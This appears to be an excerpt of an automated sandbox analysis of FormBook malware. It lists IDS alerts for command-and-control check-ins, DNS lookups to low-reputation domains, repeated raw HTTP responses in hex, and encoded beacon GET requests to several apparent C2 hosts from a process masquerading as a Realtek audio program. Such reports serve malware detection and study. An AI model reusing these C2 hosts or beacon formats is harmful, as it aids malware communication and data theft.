                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49765 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49802 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49822 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49774 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49823 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49830 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49829 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49831 -> 208.91.197.27:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.juewucangku.xyz
                Source: DNS query: www.juewucangku.xyz
                Source: DNS query: www.foggvdqutxzgea.xyz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0350D356 recv,3_2_0350D356
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:53:24 GMTserver: Apacheset-cookie: __tad=1733234004.7002375; expires=Fri, 01-Dec-2034 13:53:24 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 57 6c 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 f2 24 26 69 50 e4 bf 97 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 b7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 6b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 85 c4 7c b7 37 ef f3 cf c9 22 8a f2 1c 6e 90 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 b7 28 b7 84 0c 7c e0 01 d5 00 b5 08 cf e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b eb b1 54 3a 85 bb 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 25 db bb 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 27 27 df 6f 58 87 a8 d3 bb ce 1a 45 96 43 ab 79 90 ed f1 18 32 1f b3 a2 c9 24 e3 26 98 b4 e9 a1 ac b8 5a b6 42 b6 33 7d 8c f3 cb c4 a1 df 6a 0a e7 77 10 f6 23 b1 0b 3a 83 9d e4 fc 84 c8 76 ca 07 b2 6f f5 62 80 49 8d e2 c1 52 fa e4 6e 7a 3a 7d 5b bb 02 cd 90 10 74 1f 81 b1 b2 4d d1 b9 a1 e3 ff 7f 87 a1 ab cf e7 8e 0e 3c ca b0 b4 35 37 1a 02 76 e5 ec d6 d4 f3 b3 cb d9 a5 bc fa 08 47 60 f4 00 e2 b4 f1 5a 0c e8 e5 4a 5a 6d 5d 19 9f 35 c3 8a 21 8c 2d 6f 67 c3 e2 a1 2d 6a b5 83 21 b7 4c 6a e5 59 fd 61 0e c6 1a 5c 24 55 21 a0 75 d8 94 af 0f 71 18 87 ab a4 fa a2 f9 10 5a 74 38 4c ab 21 74 45 2e f8 0a 31 09 53 19 3b 5a 2a 3a 24 ae cd 55 2f f0 ef 56 ed ca 98 69 b8 fd 6d 0c 3c 45 c4 89 65 3c 5b c0 ef eb 1f e5 9b a8 3f 84 6b fa 58 9d 7b 10 cc 0f bd 08 7f 8a 7b 31 31 bf 23 30 04 00 00 Data Ascii: TMo0=pvNWl;a"Y$&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'kh'8CI2(!iy|7"n@6p5A5(|Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#%`'kMs\''oXECy2$&ZB3}jw#:vobIRnz:}[tM<57vG`ZJZm]5!-og-j!LjYa\$U!uqZt8L!tE.1S;Z*:$U/Vim<Ee<[?kX{{11#0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:53:27 GMTserver: Apacheset-cookie: __tad=1733234007.2576216; expires=Fri, 01-Dec-2034 13:53:27 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 57 6c 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 f2 24 26 69 50 e4 bf 97 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 b7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 6b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 85 c4 7c b7 37 ef f3 cf c9 22 8a f2 1c 6e 90 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 b7 28 b7 84 0c 7c e0 01 d5 00 b5 08 cf e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b eb b1 54 3a 85 bb 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 25 db bb 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 27 27 df 6f 58 87 a8 d3 bb ce 1a 45 96 43 ab 79 90 ed f1 18 32 1f b3 a2 c9 24 e3 26 98 b4 e9 a1 ac b8 5a b6 42 b6 33 7d 8c f3 cb c4 a1 df 6a 0a e7 77 10 f6 23 b1 0b 3a 83 9d e4 fc 84 c8 76 ca 07 b2 6f f5 62 80 49 8d e2 c1 52 fa e4 6e 7a 3a 7d 5b bb 02 cd 90 10 74 1f 81 b1 b2 4d d1 b9 a1 e3 ff 7f 87 a1 ab cf e7 8e 0e 3c ca b0 b4 35 37 1a 02 76 e5 ec d6 d4 f3 b3 cb d9 a5 bc fa 08 47 60 f4 00 e2 b4 f1 5a 0c e8 e5 4a 5a 6d 5d 19 9f 35 c3 8a 21 8c 2d 6f 67 c3 e2 a1 2d 6a b5 83 21 b7 4c 6a e5 59 fd 61 0e c6 1a 5c 24 55 21 a0 75 d8 94 af 0f 71 18 87 ab a4 fa a2 f9 10 5a 74 38 4c ab 21 74 45 2e f8 0a 31 09 53 19 3b 5a 2a 3a 24 ae cd 55 2f f0 ef 56 ed ca 98 69 b8 fd 6d 0c 3c 45 c4 89 65 3c 5b c0 ef eb 1f e5 9b a8 3f 84 6b fa 58 9d 7b 10 cc 0f bd 08 7f 8a 7b 31 31 bf 23 30 04 00 00 Data Ascii: TMo0=pvNWl;a"Y$&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'kh'8CI2(!iy|7"n@6p5A5(|Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#%`'kMs\''oXECy2$&ZB3}jw#:vobIRnz:}[tM<57vG`ZJZm]5!-og-j!LjYa\$U!uqZt8L!tE.1S;Z*:$U/Vim<Ee<[?kX{{11#0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:53:29 GMTserver: Apacheset-cookie: __tad=1733234009.7981421; expires=Fri, 01-Dec-2034 13:53:29 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 57 6c 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 f2 24 26 69 50 e4 bf 97 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 b7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 6b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 85 c4 7c b7 37 ef f3 cf c9 22 8a f2 1c 6e 90 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 b7 28 b7 84 0c 7c e0 01 d5 00 b5 08 cf e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b eb b1 54 3a 85 bb 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 25 db bb 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 27 27 df 6f 58 87 a8 d3 bb ce 1a 45 96 43 ab 79 90 ed f1 18 32 1f b3 a2 c9 24 e3 26 98 b4 e9 a1 ac b8 5a b6 42 b6 33 7d 8c f3 cb c4 a1 df 6a 0a e7 77 10 f6 23 b1 0b 3a 83 9d e4 fc 84 c8 76 ca 07 b2 6f f5 62 80 49 8d e2 c1 52 fa e4 6e 7a 3a 7d 5b bb 02 cd 90 10 74 1f 81 b1 b2 4d d1 b9 a1 e3 ff 7f 87 a1 ab cf e7 8e 0e 3c ca b0 b4 35 37 1a 02 76 e5 ec d6 d4 f3 b3 cb d9 a5 bc fa 08 47 60 f4 00 e2 b4 f1 5a 0c e8 e5 4a 5a 6d 5d 19 9f 35 c3 8a 21 8c 2d 6f 67 c3 e2 a1 2d 6a b5 83 21 b7 4c 6a e5 59 fd 61 0e c6 1a 5c 24 55 21 a0 75 d8 94 af 0f 71 18 87 ab a4 fa a2 f9 10 5a 74 38 4c ab 21 74 45 2e f8 0a 31 09 53 19 3b 5a 2a 3a 24 ae cd 55 2f f0 ef 56 ed ca 98 69 b8 fd 6d 0c 3c 45 c4 89 65 3c 5b c0 ef eb 1f e5 9b a8 3f 84 6b fa 58 9d 7b 10 cc 0f bd 08 7f 8a 7b 31 31 bf 23 30 04 00 00 Data Ascii: TMo0=pvNWl;a"Y$&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'kh'8CI2(!iy|7"n@6p5A5(|Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#%`'kMs\''oXECy2$&ZB3}jw#:vobIRnz:}[tM<57vG`ZJZm]5!-og-j!LjYa\$U!uqZt8L!tE.1S;Z*:$U/Vim<Ee<[?kX{{11#0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:56:54 GMTserver: Apacheset-cookie: __tad=1733234214.7907578; expires=Fri, 01-Dec-2034 13:56:54 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 57 6c 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 f2 24 26 69 50 e4 bf 97 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 b7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 6b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 85 c4 7c b7 37 ef f3 cf c9 22 8a f2 1c 6e 90 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 b7 28 b7 84 0c 7c e0 01 d5 00 b5 08 cf e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b eb b1 54 3a 85 bb 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 25 db bb 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 27 27 df 6f 58 87 a8 d3 bb ce 1a 45 96 43 ab 79 90 ed f1 18 32 1f b3 a2 c9 24 e3 26 98 b4 e9 a1 ac b8 5a b6 42 b6 33 7d 8c f3 cb c4 a1 df 6a 0a e7 77 10 f6 23 b1 0b 3a 83 9d e4 fc 84 c8 76 ca 07 b2 6f f5 62 80 49 8d e2 c1 52 fa e4 6e 7a 3a 7d 5b bb 02 cd 90 10 74 1f 81 b1 b2 4d d1 b9 a1 e3 ff 7f 87 a1 ab cf e7 8e 0e 3c ca b0 b4 35 37 1a 02 76 e5 ec d6 d4 f3 b3 cb d9 a5 bc fa 08 47 60 f4 00 e2 b4 f1 5a 0c e8 e5 4a 5a 6d 5d 19 9f 35 c3 8a 21 8c 2d 6f 67 c3 e2 a1 2d 6a b5 83 21 b7 4c 6a e5 59 fd 61 0e c6 1a 5c 24 55 21 a0 75 d8 94 af 0f 71 18 87 ab a4 fa a2 f9 10 5a 74 38 4c ab 21 74 45 2e f8 0a 31 09 53 19 3b 5a 2a 3a 24 ae cd 55 2f f0 ef 56 ed ca 98 69 b8 fd 6d 0c 3c 45 c4 89 65 3c 5b c0 ef eb 1f e5 9b a8 3f 84 6b fa 58 9d 7b 10 cc 0f bd 08 7f 8a 7b 31 31 bf 23 30 04 00 00 Data Ascii: TMo0=pvNWl;a"Y$&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'kh'8CI2(!iy|7"n@6p5A5(|Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#%`'kMs\''oXECy2$&ZB3}jw#:vobIRnz:}[tM<57vG`ZJZm]5!-og-j!LjYa\$U!uqZt8L!tE.1S;Z*:$U/Vim<Ee<[?kX{{11#0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:56:57 GMTserver: Apacheset-cookie: __tad=1733234217.8591296; expires=Fri, 01-Dec-2034 13:56:57 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 57 6c 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 f2 24 26 69 50 e4 bf 97 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 b7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 6b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 85 c4 7c b7 37 ef f3 cf c9 22 8a f2 1c 6e 90 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 b7 28 b7 84 0c 7c e0 01 d5 00 b5 08 cf e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b eb b1 54 3a 85 bb 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 25 db bb 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 27 27 df 6f 58 87 a8 d3 bb ce 1a 45 96 43 ab 79 90 ed f1 18 32 1f b3 a2 c9 24 e3 26 98 b4 e9 a1 ac b8 5a b6 42 b6 33 7d 8c f3 cb c4 a1 df 6a 0a e7 77 10 f6 23 b1 0b 3a 83 9d e4 fc 84 c8 76 ca 07 b2 6f f5 62 80 49 8d e2 c1 52 fa e4 6e 7a 3a 7d 5b bb 02 cd 90 10 74 1f 81 b1 b2 4d d1 b9 a1 e3 ff 7f 87 a1 ab cf e7 8e 0e 3c ca b0 b4 35 37 1a 02 76 e5 ec d6 d4 f3 b3 cb d9 a5 bc fa 08 47 60 f4 00 e2 b4 f1 5a 0c e8 e5 4a 5a 6d 5d 19 9f 35 c3 8a 21 8c 2d 6f 67 c3 e2 a1 2d 6a b5 83 21 b7 4c 6a e5 59 fd 61 0e c6 1a 5c 24 55 21 a0 75 d8 94 af 0f 71 18 87 ab a4 fa a2 f9 10 5a 74 38 4c ab 21 74 45 2e f8 0a 31 09 53 19 3b 5a 2a 3a 24 ae cd 55 2f f0 ef 56 ed ca 98 69 b8 fd 6d 0c 3c 45 c4 89 65 3c 5b c0 ef eb 1f e5 9b a8 3f 84 6b fa 58 9d 7b 10 cc 0f bd 08 7f 8a 7b 31 31 bf 23 30 04 00 00 Data Ascii: TMo0=pvNWl;a"Y$&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'kh'8CI2(!iy|7"n@6p5A5(|Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#%`'kMs\''oXECy2$&ZB3}jw#:vobIRnz:}[tM<57vG`ZJZm]5!-og-j!LjYa\$U!uqZt8L!tE.1S;Z*:$U/Vim<Ee<[?kX{{11#0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:57:00 GMTserver: Apacheset-cookie: __tad=1733234220.8953293; expires=Fri, 01-Dec-2034 13:57:00 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 57 6c 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 f2 24 26 69 50 e4 bf 97 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 b7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 6b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 85 c4 7c b7 37 ef f3 cf c9 22 8a f2 1c 6e 90 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 b7 28 b7 84 0c 7c e0 01 d5 00 b5 08 cf e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b eb b1 54 3a 85 bb 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 25 db bb 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 27 27 df 6f 58 87 a8 d3 bb ce 1a 45 96 43 ab 79 90 ed f1 18 32 1f b3 a2 c9 24 e3 26 98 b4 e9 a1 ac b8 5a b6 42 b6 33 7d 8c f3 cb c4 a1 df 6a 0a e7 77 10 f6 23 b1 0b 3a 83 9d e4 fc 84 c8 76 ca 07 b2 6f f5 62 80 49 8d e2 c1 52 fa e4 6e 7a 3a 7d 5b bb 02 cd 90 10 74 1f 81 b1 b2 4d d1 b9 a1 e3 ff 7f 87 a1 ab cf e7 8e 0e 3c ca b0 b4 35 37 1a 02 76 e5 ec d6 d4 f3 b3 cb d9 a5 bc fa 08 47 60 f4 00 e2 b4 f1 5a 0c e8 e5 4a 5a 6d 5d 19 9f 35 c3 8a 21 8c 2d 6f 67 c3 e2 a1 2d 6a b5 83 21 b7 4c 6a e5 59 fd 61 0e c6 1a 5c 24 55 21 a0 75 d8 94 af 0f 71 18 87 ab a4 fa a2 f9 10 5a 74 38 4c ab 21 74 45 2e f8 0a 31 09 53 19 3b 5a 2a 3a 24 ae cd 55 2f f0 ef 56 ed ca 98 69 b8 fd 6d 0c 3c 45 c4 89 65 3c 5b c0 ef eb 1f e5 9b a8 3f 84 6b fa 58 9d 7b 10 cc 0f bd 08 7f 8a 7b 31 31 bf 23 30 04 00 00 Data Ascii: TMo0=pvNWl;a"Y$&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'kh'8CI2(!iy|7"n@6p5A5(|Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#%`'kMs\''oXECy2$&ZB3}jw#:vobIRnz:}[tM<57vG`ZJZm]5!-og-j!LjYa\$U!uqZt8L!tE.1S;Z*:$U/Vim<Ee<[?kX{{11#0
                Source: global trafficHTTP traffic detected: GET /oz0e/?pluxVm=N0iBPOr2h1wf3hrk0fV7bCYuQaQcnemlKlX+67l0LxDwIz/NET6JyzgCPnJBSBJZztg4pX1Iwr0Nd76JZuhGak0dZt9NjSAeSo6fySf0UlwbimsbHDdeRZs=&Z1EO=OvfHeluUy HTTP/1.1Host: www.88rtp.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /o5mm/?pluxVm=52ZaOoJJHsYFYpcE8OJe6kaaR+Ibp2Nxq28CYNd7tHRxqCukViCUoHxjhmN2/g+W5SkTzZJsaEIA3pVY9O1vDv+SN/8yFpfSlnbOuEouoKz6AG71fS9yZK8=&Z1EO=OvfHeluUy HTTP/1.1Host: www.kubex.devAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /073p/?pluxVm=NsdLHLYUe9sblrm0I+Crv144tHMQQbz/4RSieCn+7DwPKByw7jhxCyJ0LTJMQHRDPlmDRdKjKllFY9ccUXh843okMet3hg+QsBhX3tP/6BR9rZiNBzb3ESI=&Z1EO=OvfHeluUy HTTP/1.1Host: www.sido247.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /dheh/?pluxVm=6JcMAOZ0kkEuPLPobYSFFslgEkquVWiK5Nqk+SkmZf4Wc9f19ayTyDiVFSf9h78jkWY5XnirO34u2f/fghaoX1igb+ZsamnQxKAe0eVMQ+zxkvaWI9vtOSA=&Z1EO=OvfHeluUy HTTP/1.1Host: www.glowups.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /mdkc/?pluxVm=yWWHbhCahbG3DdaBnt9NrGvMUCSQc4g2Tqe6SUjOSsODgr6CFa5SJdyjtzT5mznodS2lvT8/GpN3gvUqymh3/8TyFQ0rIiTFrx443/jhZTAx0fULTMMcMck=&Z1EO=OvfHeluUy HTTP/1.1Host: www.epicurecooks.worldAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /og0p/?pluxVm=aYNz5vX3IaeBLII2gGf9eURLdfN+pzrBFxzqHFB0Zc0E767K5MaAH/EqLovM7A815HxojS38W68HbT3JNl21N4jIU1lh5jKS99Zmbqcxop+R6eeWU//8U3E=&Z1EO=OvfHeluUy HTTP/1.1Host: www.eichner.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqhH+dns4k5MWxqP8Bok6NcIC1536fve9u1GdSOEvFZBDrTYEySAKG7uhWgC+P8=&Z1EO=OvfHeluUy HTTP/1.1Host: www.juewucangku.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
